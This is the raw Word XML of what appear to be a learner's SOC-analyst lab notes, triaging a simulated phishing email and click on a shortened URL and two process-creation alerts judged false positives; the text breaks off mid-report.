    <w:p w14:paraId="26447895" w14:textId="77777777" w:rsidR="002B59F4" w:rsidRPr="002B59F4" w:rsidRDefault="002B59F4" w:rsidP="002B59F4">
      <w:r w:rsidRPr="002B59F4">
        <w:t>h.harris@thetrydaily.thm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD2BE7A" w14:textId="77777777" w:rsidR="002B59F4" w:rsidRPr="002B59F4" w:rsidRDefault="002B59F4" w:rsidP="002B59F4">
      <w:r w:rsidRPr="002B59F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reason for Classifying as True Positive:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B59F4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE219B3" w14:textId="77777777" w:rsidR="002B59F4" w:rsidRPr="002B59F4" w:rsidRDefault="002B59F4" w:rsidP="002B59F4">
      <w:r w:rsidRPr="002B59F4">
        <w:t>Shortened URL, Website has been blocked, Tone of urgency in email content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5300B787" w14:textId="77777777" w:rsidR="002B59F4" w:rsidRPr="002B59F4" w:rsidRDefault="002B59F4" w:rsidP="002B59F4">
      <w:r w:rsidRPr="002B59F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reason for Escalating the Alert:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B59F4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8D852A" w14:textId="77777777" w:rsidR="002B59F4" w:rsidRPr="002B59F4" w:rsidRDefault="002B59F4" w:rsidP="002B59F4">
      <w:r w:rsidRPr="002B59F4">
        <w:t>The alert is escalated because the recipient attempted to access the malicious URL, which could have led to credential theft or compromise if not blocked. Escalation ensures higher-level SOC analysts or IT security staff can review the endpoint, update threat intelligence, and apply user education to prevent future incidents.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193A9545" w14:textId="77777777" w:rsidR="002B59F4" w:rsidRPr="002B59F4" w:rsidRDefault="002B59F4" w:rsidP="002B59F4">
      <w:r w:rsidRPr="002B59F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Recommended Remediation Actions:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B59F4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777D38F4" w14:textId="77777777" w:rsidR="002B59F4" w:rsidRPr="002B59F4" w:rsidRDefault="002B59F4" w:rsidP="002B59F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B59F4">
        <w:t>Block the malicious URL (http://bit.ly/3sHkX3da12340) at firewall and proxy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FECE05" w14:textId="77777777" w:rsidR="002B59F4" w:rsidRPr="002B59F4" w:rsidRDefault="002B59F4" w:rsidP="002B59F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B59F4">
        <w:t>Verify that the endpoint (IP 10.20.2.17) is free from malware or compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F326683" w14:textId="77777777" w:rsidR="002B59F4" w:rsidRPr="002B59F4" w:rsidRDefault="002B59F4" w:rsidP="002B59F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B59F4">
        <w:t>Inform and educate the user about the phishing attempt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B93A17B" w14:textId="77777777" w:rsidR="002B59F4" w:rsidRPr="002B59F4" w:rsidRDefault="002B59F4" w:rsidP="002B59F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B59F4">
        <w:t>Add the sender domain (amazon.biz) to email filtering and threat intelligence blocklists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A6C91E" w14:textId="77777777" w:rsidR="002B59F4" w:rsidRPr="002B59F4" w:rsidRDefault="002B59F4" w:rsidP="002B59F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B59F4">
        <w:lastRenderedPageBreak/>
        <w:t>Monitor for additional phishing attempts targeting other users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7E7124" w14:textId="77777777" w:rsidR="002B59F4" w:rsidRPr="002B59F4" w:rsidRDefault="002B59F4" w:rsidP="002B59F4">
      <w:r w:rsidRPr="002B59F4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>List of Attack Indicators:</w:t>
      </w:r>
      <w:r w:rsidRPr="002B59F4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03C76BD7" w14:textId="77777777" w:rsidR="002B59F4" w:rsidRPr="002B59F4" w:rsidRDefault="002B59F4" w:rsidP="002B59F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B59F4">
        <w:t>Shortened URL: http://bit.ly/3sHkX3da12340</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1480D107" w14:textId="77777777" w:rsidR="002B59F4" w:rsidRPr="002B59F4" w:rsidRDefault="002B59F4" w:rsidP="002B59F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B59F4">
        <w:t>Firewall blocked access to the website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDFBCAE" w14:textId="77777777" w:rsidR="002B59F4" w:rsidRPr="002B59F4" w:rsidRDefault="002B59F4" w:rsidP="002B59F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B59F4">
        <w:t>Email tone of urgency / social engineering content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E562F76" w14:textId="77777777" w:rsidR="002B59F4" w:rsidRPr="002B59F4" w:rsidRDefault="002B59F4" w:rsidP="002B59F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B59F4">
        <w:t>Suspicious sender domain: urgents@amazon.biz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6789F2" w14:textId="77777777" w:rsidR="002B59F4" w:rsidRPr="002B59F4" w:rsidRDefault="002B59F4" w:rsidP="002B59F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="002B59F4">
        <w:t>Targeted recipient: h.harris@thetrydaily.thm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E23FF13" w14:textId="77777777" w:rsidR="002B59F4" w:rsidRPr="002B59F4" w:rsidRDefault="002B59F4" w:rsidP="002B59F4">
      <w:r w:rsidRPr="002B59F4">
        <w:t>Shortened URL, Website has been blocked, Tone of urgency in email content</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220356EE" w14:textId="77777777" w:rsidR="002B59F4" w:rsidRDefault="002B59F4"/>
    <w:p w14:paraId="54F60D4B" w14:textId="042E0F64" w:rsidR="002B59F4" w:rsidRDefault="002B59F4">
      <w:r>
        <w:t>Next-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C59B487" w14:textId="48766C15" w:rsidR="002B59F4" w:rsidRDefault="002B59F4">
      <w:r w:rsidRPr="002B59F4">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="021D3660" wp14:editId="30F239D7">
            <wp:extent cx="5731510" cy="2032635"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="685934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934440" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2032635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FB27DA" w14:textId="25FA063C" w:rsidR="002B59F4" w:rsidRDefault="002B59F4">
      <w:r>
        <w:t>Now this alert is just a result of the previous email phishing attempt, as this alert suggests that the user actually clicked on the link</w:t>
      </w:r>
      <w:r w:rsidR="005F5A6C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C3AF80" w14:textId="6DEFCDFA" w:rsidR="005F5A6C" w:rsidRDefault="005F5A6C">
      <w:r>
        <w:t xml:space="preserve"> Case report – </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403F27CD" w14:textId="77777777" w:rsidR="005F5A6C" w:rsidRPr="005F5A6C" w:rsidRDefault="005F5A6C" w:rsidP="005F5A6C">
      <w:r w:rsidRPr="005F5A6C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Time of activity:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F5A6C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005F5A6C">
        <w:br/>
        <w:t>Nov 22nd 2025 at 18:53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E6BA77" w14:textId="77777777" w:rsidR="005F5A6C" w:rsidRPr="005F5A6C" w:rsidRDefault="005F5A6C" w:rsidP="005F5A6C">
      <w:r w:rsidRPr="005F5A6C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>List of Affected Entities:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F5A6C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8C3CA7" w14:textId="77777777" w:rsidR="005F5A6C" w:rsidRPr="005F5A6C" w:rsidRDefault="005F5A6C" w:rsidP="005F5A6C">
      <w:r w:rsidRPr="005F5A6C">
        <w:t> 10.20.2.17</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFF88D7" w14:textId="77777777" w:rsidR="005F5A6C" w:rsidRPr="005F5A6C" w:rsidRDefault="005F5A6C" w:rsidP="005F5A6C">
      <w:r w:rsidRPr="005F5A6C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reason for Classifying as True Positive:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F5A6C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F318674" w14:textId="77777777" w:rsidR="005F5A6C" w:rsidRPr="005F5A6C" w:rsidRDefault="005F5A6C" w:rsidP="005F5A6C">
      <w:r w:rsidRPr="005F5A6C">
        <w:t xml:space="preserve">The alert is classified as a </w:t>
      </w:r>
      <w:r w:rsidRPr="005F5A6C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>True Positive</w:t>
      </w:r>
      <w:r w:rsidRPr="005F5A6C">
        <w:t xml:space="preserve"> because the user attempted to access a known malicious URL (http://bit.ly/3sHkX3da12340) that is listed in the organization's blacklist. Firewall logs confirm that the access was blocked, preventing potential compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A001524" w14:textId="77777777" w:rsidR="005F5A6C" w:rsidRPr="005F5A6C" w:rsidRDefault="005F5A6C" w:rsidP="005F5A6C">
      <w:r w:rsidRPr="005F5A6C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Reason for Escalating the Alert:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F5A6C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6037C970" w14:textId="77777777" w:rsidR="005F5A6C" w:rsidRPr="005F5A6C" w:rsidRDefault="005F5A6C" w:rsidP="005F5A6C">
      <w:r w:rsidRPr="005F5A6C">
        <w:t>The alert is escalated because the user attempted to access a high-risk URL. Even though the firewall blocked the connection, there is a potential risk of credential theft or endpoint compromise. Escalation allows SOC analysts or IT security staff to verify the endpoint, ensure no further threats exist, and provide user awareness guidance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5737B2D7" w14:textId="77777777" w:rsidR="005F5A6C" w:rsidRPr="005F5A6C" w:rsidRDefault="005F5A6C" w:rsidP="005F5A6C">
      <w:r w:rsidRPr="005F5A6C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Recommended Remediation Actions:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F5A6C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED4C431" w14:textId="77777777" w:rsidR="005F5A6C" w:rsidRPr="005F5A6C" w:rsidRDefault="005F5A6C" w:rsidP="005F5A6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F5A6C">
        <w:t>Block the URL in all web filters and proxy logs to prevent future attempts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1377365D" w14:textId="77777777" w:rsidR="005F5A6C" w:rsidRPr="005F5A6C" w:rsidRDefault="005F5A6C" w:rsidP="005F5A6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="18"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F5A6C">
        <w:t>Verify the endpoint (IP 10.20.2.17) is not compromised.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6D47DA" w14:textId="77777777" w:rsidR="005F5A6C" w:rsidRPr="005F5A6C" w:rsidRDefault="005F5A6C" w:rsidP="005F5A6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F5A6C">
        <w:t>Educate the user about phishing attempts and safe browsing practices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6A6DA1" w14:textId="77777777" w:rsidR="005F5A6C" w:rsidRPr="005F5A6C" w:rsidRDefault="005F5A6C" w:rsidP="005F5A6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F5A6C">
        <w:t>Monitor the firewall/proxy logs for repeated attempts or similar URLs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FCA7DB" w14:textId="77777777" w:rsidR="005F5A6C" w:rsidRPr="005F5A6C" w:rsidRDefault="005F5A6C" w:rsidP="005F5A6C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F5A6C">
        <w:t>Add the domain to threat intelligence blocklists for proactive protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC06BD4" w14:textId="77777777" w:rsidR="005F5A6C" w:rsidRPr="005F5A6C" w:rsidRDefault="005F5A6C" w:rsidP="005F5A6C">
      <w:r w:rsidRPr="005F5A6C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>List of Attack Indicators:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F5A6C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F573BD" w14:textId="77777777" w:rsidR="005F5A6C" w:rsidRPr="005F5A6C" w:rsidRDefault="005F5A6C" w:rsidP="005F5A6C">
      <w:r w:rsidRPr="005F5A6C">
        <w:t xml:space="preserve">External IP, shortened URL, sent by an unreliably </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F5A6C">
        <w:t>domained</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F5A6C">
        <w:t xml:space="preserve"> email</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B31D33" w14:textId="77777777" w:rsidR="005F5A6C" w:rsidRDefault="005F5A6C"/>
    <w:p w14:paraId="5D198205" w14:textId="40E20F1B" w:rsidR="00C05BC3" w:rsidRDefault="00C05BC3">
      <w:r>
        <w:t>Next –</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395E6890" w14:textId="645B1DA0" w:rsidR="00C05BC3" w:rsidRDefault="00C05BC3">
      <w:r w:rsidRPr="00C05BC3">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="168C5FBD" wp14:editId="2F3D1536">
            <wp:extent cx="5731510" cy="2569845"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="4590703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070373" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2569845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4F41CE" w14:textId="77777777" w:rsidR="00C05BC3" w:rsidRPr="00C05BC3" w:rsidRDefault="00C05BC3" w:rsidP="00C05BC3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C05BC3">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00C05BC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Reason for Classifying as False Positive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A9C5408" w14:textId="77777777" w:rsidR="00C05BC3" w:rsidRPr="00C05BC3" w:rsidRDefault="00C05BC3" w:rsidP="00C05BC3">
      <w:r w:rsidRPr="00C05BC3">
        <w:t xml:space="preserve">The alert was triggered due to an uncommon parent–child process relationship involving services.exe and TrustedInstaller.exe. After investigation, the activity was determined to be </w:t>
      </w:r>
      <w:r w:rsidRPr="00C05BC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">legitimate Windows </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C05BC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C05BC3">
        <w:t xml:space="preserve"> rather than malicious. TrustedInstaller.exe is the Windows Modules Installer responsible for servicing operations such as Windows Updates and component installation. It is normally launched and managed by services.exe, the Service Control Manager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A50625E" w14:textId="77777777" w:rsidR="00C05BC3" w:rsidRPr="00C05BC3" w:rsidRDefault="00C05BC3" w:rsidP="00C05BC3">
      <w:r w:rsidRPr="00C05BC3">
        <w:t>Verification steps confirmed that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DA711C" w14:textId="77777777" w:rsidR="00C05BC3" w:rsidRPr="00C05BC3" w:rsidRDefault="00C05BC3" w:rsidP="00C05BC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C05BC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File paths matched default Windows locations</w:t>
      </w:r>
      <w:r w:rsidRPr="00C05BC3">
        <w:t xml:space="preserve"> (C:\Windows\servicing\TrustedInstaller.exe and C:\Windows\System32\services.exe).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F322B85" w14:textId="77777777" w:rsidR="00C05BC3" w:rsidRPr="00C05BC3" w:rsidRDefault="00C05BC3" w:rsidP="00C05BC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C05BC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Digital signatures were valid and signed by Microsoft</w:t>
      </w:r>
      <w:r w:rsidRPr="00C05BC3">
        <w:t>, ruling out tampering or impersonation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BC59D1" w14:textId="77777777" w:rsidR="00C05BC3" w:rsidRPr="00C05BC3" w:rsidRDefault="00C05BC3" w:rsidP="00C05BC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C05BC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No abnormal child processes, registry modifications, or network connections</w:t>
      </w:r>
      <w:r w:rsidRPr="00C05BC3">
        <w:t xml:space="preserve"> were observed associated with TrustedInstaller.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECE9238" w14:textId="77777777" w:rsidR="00C05BC3" w:rsidRPr="00C05BC3" w:rsidRDefault="00C05BC3" w:rsidP="00C05BC3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C05BC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Windows servicing logs</w:t>
      </w:r>
      <w:r w:rsidRPr="00C05BC3">
        <w:t xml:space="preserve"> showed normal component or update-related activity around the alert timestamp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CC72BF" w14:textId="77777777" w:rsidR="00C05BC3" w:rsidRPr="00C05BC3" w:rsidRDefault="00C05BC3" w:rsidP="00C05BC3">
      <w:r w:rsidRPr="00C05BC3">
        <w:t xml:space="preserve">Since no signs of malicious </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C05BC3">
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C05BC3">
        <w:t xml:space="preserve">, persistence, or lateral movement were identified, this process creation event is consistent with </w:t>
      </w:r>
      <w:r w:rsidRPr="00C05BC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>legitimate system maintenance activity</w:t>
      </w:r>
      <w:r w:rsidRPr="00C05BC3">
        <w:t xml:space="preserve">. Therefore, the detection is classified as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C05BC3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>false positive</w:t>
      </w:r>
      <w:r w:rsidRPr="00C05BC3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E05C3C" w14:textId="65770746" w:rsidR="00C05BC3" w:rsidRDefault="00EC6874">
      <w:r>
        <w:t>WHAT IS SUSPICIOUS PARENT CHILD RELATIONSHIP?</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>It is when an ongoing process creates/spawns/accesses another process for its execution. So in this case process with PID 3506(parent) running services.exe spawns a process 3577(child) running TrustedInstaller.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB09081" w14:textId="363073E3" w:rsidR="00EC6874" w:rsidRDefault="00EC6874">
      <w:r>
        <w:t>NEXT-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB4BB8A" w14:textId="0F12A6DB" w:rsidR="00EC6874" w:rsidRDefault="00EC6874">
      <w:r w:rsidRPr="00EC6874">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5B39ECCA" wp14:editId="01CEBA7E">
            <wp:extent cx="5731510" cy="2136775"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="10193268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9326836" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2136775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE6D92F" w14:textId="67B8E974" w:rsidR="00EC6874" w:rsidRDefault="00EC6874">
      <w:r>
        <w:t xml:space="preserve">False positive case report : - </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA95A2F" w14:textId="77777777" w:rsidR="00EC6874" w:rsidRPr="00EC6874" w:rsidRDefault="00EC6874" w:rsidP="00EC6874">
      <w:r w:rsidRPr="00EC6874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Time of Activity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC6874">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F5768C" w14:textId="77777777" w:rsidR="00EC6874" w:rsidRPr="00EC6874" w:rsidRDefault="00EC6874" w:rsidP="00EC6874">
      <w:r w:rsidRPr="00EC6874">
        <w:t> 11/23/2025 05:41:06.349</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED1988D" w14:textId="77777777" w:rsidR="00EC6874" w:rsidRPr="00EC6874" w:rsidRDefault="00EC6874" w:rsidP="00EC6874">
      <w:r w:rsidRPr="00EC6874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>List of Related Entities:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EC6874">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D61BD6" w14:textId="77777777" w:rsidR="00EC6874" w:rsidRPr="00EC6874" w:rsidRDefault="00EC6874" w:rsidP="00EC6874">
      <w:r w:rsidRPr="00EC6874">
        <w:t>host.name: win-3451</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F6A693" w14:textId="77777777" w:rsidR="00EC6874" w:rsidRPr="00EC6874" w:rsidRDefault="00EC6874" w:rsidP="00EC6874">
      <w:r w:rsidRPr="00EC6874">
        <w:t>process.name: taskhostw.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22613A55" w14:textId="77777777" w:rsidR="00EC6874" w:rsidRPr="00EC6874" w:rsidRDefault="00EC6874" w:rsidP="00EC6874">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC6874">
        <w:t>process.pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC6874">
        <w:t>: 3585</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07079C0F" w14:textId="77777777" w:rsidR="00EC6874" w:rsidRPr="00EC6874" w:rsidRDefault="00EC6874" w:rsidP="00EC6874">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC6874">
        <w:t>process.parent.pid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC6874">
        <w:t>: 3653</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49FAA25F" w14:textId="77777777" w:rsidR="00EC6874" w:rsidRPr="00EC6874" w:rsidRDefault="00EC6874" w:rsidP="00EC6874">
      <w:r w:rsidRPr="00EC6874">
        <w:t>process.parent.name: svchost.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F33F5D2" w14:textId="0C39B4E2" w:rsidR="00EC6874" w:rsidRPr="00EC6874" w:rsidRDefault="00EC6874" w:rsidP="00EC6874">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EC6874">
        <w:t>process.command_line</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00EC6874">
        <w:t>: taskhostw.exe KEYROAMING</w:t>
      </w:r>
      <w:r w:rsidR="006F454C">
